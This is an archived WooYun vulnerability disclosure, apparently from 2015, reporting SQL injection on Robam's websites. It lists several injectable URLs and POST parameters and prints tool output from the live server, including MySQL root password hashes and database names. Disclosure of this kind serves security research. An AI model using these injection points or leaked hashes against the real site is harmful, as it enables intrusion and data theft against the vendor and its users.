乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-01: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-06-15: 厂商已经主动忽略漏洞,细节向公众公开
sql
WooYun: 老板电器主站SQL注入全部信息沦陷 无聊在乌云看漏洞,看看前提的公开漏洞
Target: http://m.robam.com/2c1.php?classid=1Host IP: 183.129.129.77Web Server: Apache/2.4.4 (Win32) PHP/5.4.16Powered-by: PHP/5.4.16DB Server: MySQLResp. Time(avg): 805 msCurrent User: root@localhostSql Version: 5.6.12Current DB: dbrobamcomSystem User: root@localhostHost Name: USER-T5K83SCQC5Installation dir: E:/Program Files/MySQL/MySQL Server 5.6/DB User & Pass: root:*AFE1E4B2058678DBCF19B7C9CF60C78D79B6A971:localhost root:*AFE1E4B2058678DBCF19B7C9CF60C78D79B6A971:127.0.0.1 root:*AFE1E4B2058678DBCF19B7C9CF60C78D79B6A971: sql:*86803CE6E3FB0482F55E703D0A87A2059FE1B5F8:%Data Bases: information_schema bonyee dbrobamcom mysql performance_schema robam_activity robam_rec robamse robamweb sakila test world
http://m.robam.com/2c1.php?classid=1http://www.robam.com/Search/search.html title=1 存在POST sql注入http://m.robam.com/2c2.php?id=17http://m.robam.com/9job_1.php?id=5http://m.robam.com/searchresult.php keyword=1 存在POST sql注入
过滤啊!
未能联系到厂商或者厂商积极拒绝